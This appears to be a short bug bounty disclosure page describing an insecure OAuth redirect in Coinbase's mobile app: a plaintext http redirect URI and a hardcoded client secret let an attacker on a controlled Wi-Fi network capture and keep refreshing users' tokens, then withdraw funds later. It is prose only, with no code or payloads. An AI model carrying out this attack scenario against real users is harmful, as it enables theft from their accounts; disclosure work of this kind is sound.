Bug Bounty: Insecure mobile app OAuth redirect on Coinbase.com

Share it with your friends Like

Thanks! Share it with your friends!

Close

This is a very simple demo of a small bug I found with Coinbase.com’s app configuration. From looking at their mobile app source code, it was easy to see that their OAuth application was set to return a token to http://example.com/coinbase-token and their mobile app was catching that URL and extracting the token before the external request was sent. The problem is an attacker can use the hardcoded client_id and client_secret to force a user who has added the Coinbase mobile app user to send their authentication token over a plaintext connection. This is a particular problem in a POS setting where an malicious merchant / attacker will typically have control over the Wifi network the user might be connecting to and can direct the victim to view a website / QR code and “Like Us” / “Tweet Us” to get a free cookie.

Once the attacker has captured the OAuth token. They cancontinually refresh it and only withdraw from the victim’s account when all attention will be lost from them

Comments

Write a comment

*